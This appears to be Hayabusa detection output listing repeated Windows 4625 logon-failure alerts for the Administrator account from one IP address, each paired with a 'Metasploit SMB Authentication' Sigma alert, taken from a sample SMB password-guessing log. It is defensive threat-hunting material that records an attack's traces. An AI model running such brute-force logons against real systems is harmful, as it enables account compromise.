NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BeDRsguCovO47lKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KqrDyaFTewMPSzD9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.445 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nBVMAki1Ghpknf6p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.489 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXKhNUmBUQBTyeNM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.535 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d1g9TVwsweaBfZgE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kWymb6ucohaBB60b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.747 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: LjL0zwlZofVuWhGC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.747 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nxsdzkJdnaZs5eKL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PR6EpKvbqMeoQlKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OZ3LMTtsVNI1gRO2 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75bNeXwYSZPhJdJ7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lH6TVXSqJb1qLd3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: edDWye6c2UhKznR6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AxKUl1lynGY1ectn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.057 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.094 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vI5yUgukPBVRorJI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.094 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmR29QcBKMGVQ8rB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.142 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.177 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: b7luV5GfiT0v0h7D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.177 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yA7pIDFgQbLIInqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.257 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 84g2gO0253Ut4O1O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.257 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DRkFX9WTAhBZ8jc8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WuoQAi4k3XZPaf4O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KjKMhCnbR0uFT0av : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.393 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1lfwqPB0AgTfIOt4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mJuG26pQzdjUQael : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GXwEziYTA3DkkFVq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CHr6dirvkT8B9ZVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: B5eSMLiF4BsfY3xN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.623 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 64ISDuFRhR6cFYVQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hcprXytyuBw380XY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxfQWiSIhZYxwNjh : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FcL982boDelzeyzK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBAAjRdaR8U0tqt7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EmqUjcltAW6StHQJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.857 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 129Rp3HCmRVRXw3C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jpIIQP2oWEF51EBI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.975 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HREGh5ppEkLAuEob : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.975 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.022 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: UVkpQvotEMfM8R0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.022 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dm6uHEy5RJJBJ6FG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HPTyAkYjcIlko5lu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.155 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OjlRoo9Sot4Fx4Th : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.155 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XslY26kw2aBw19D8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.205 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.242 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1404fakprYeqGiNY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.242 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y2VfIjtBcXCRlOjp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.281 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.317 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LPztyX4J9NV8EldT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.317 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 07flrrzWgsVBYaN2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vgkqkC1VvznGxR6N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
